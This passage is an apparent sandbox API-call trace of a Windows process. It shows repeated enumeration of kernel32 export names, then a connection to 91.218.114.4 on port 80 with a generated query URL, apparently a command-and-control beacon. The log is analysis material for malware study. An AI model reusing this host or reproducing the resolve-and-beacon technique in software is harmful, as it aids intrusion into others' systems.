lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.454] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.454] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.455] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.455] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.455] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.455] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.455] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.455] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.455] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.455] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.455] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.455] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.455] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.455] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.455] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.455] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.455] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.455] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.455] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.455] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.455] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.455] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.456] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.456] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.456] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.456] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.456] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.456] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.456] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.456] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.456] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.456] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.456] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.456] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.456] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.456] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.456] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.456] lstrlenA (lpString="DELETEATOM") returned 10 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.456] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.456] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.456] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.456] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.457] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.457] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.457] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.457] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.457] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.457] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.457] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.457] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.457] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.457] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.457] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.457] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.458] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.458] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.458] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.458] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.458] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.458] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.458] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.458] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.458] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.458] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.458] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.458] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.458] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.458] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.458] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.458] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.458] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.458] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.458] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.458] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.459] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.459] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.459] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.459] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.459] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.459] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.459] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.459] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.459] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.459] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.459] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.459] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.459] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.459] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.459] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.459] wsprintfA (in: param_1=0x610000, param_2="http://%s%s" | out: param_1="http://91.218.114.4/dpyrqpykiq.do?qn=7&e=6u5415atv&s=se3ry&lij=8ib") returned 66 [0178.459] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x640000 [0178.460] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x650000 [0178.463] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x6a0000 [0178.463] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x6b0000 [0178.463] inet_pton (in: Family=2, pszAddrString="91.218.114.4", pAddrBuf=0x31cf30c | out: pAddrBuf=0x31cf30c) returned 1 [0178.464] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x31cf758 | out: lpWSAData=0x31cf758) returned 0 [0178.500] socket (af=2, type=1, protocol=6) returned 0x228 [0178.592] inet_addr (cp="91.218.114.4") returned 0x472da5b [0178.592] htons (hostshort=0x50) returned 0x5000 [0178.592] connect (s=0x228, name=0x31cf2e8*(sa_family=2, sin_port=0x50, sin_addr="91.218.114.4"), namelen=16) returned 0 [0178.647] lstrlenA (lpString="kernel32.dll") returned 12 [0178.647] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.647] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.647] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.647] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.647] lstrlenA (lpString="ADDATOMA") returned 8 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.647] lstrlenA (lpString="ADDATOMW") returned 8 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.647] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.647] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.647] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.647] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.647] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.647] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.647] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.648] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.648] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.648] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.648] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.648] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.648] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.648] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.648] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.648] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.648] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.648] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.648] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.648] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.648] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.648] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.648] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.648] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.648] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.648] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.649] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.649] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.649] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.649] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.649] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.649] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.649] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.649] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.649] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.649] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.649] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.649] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.649] 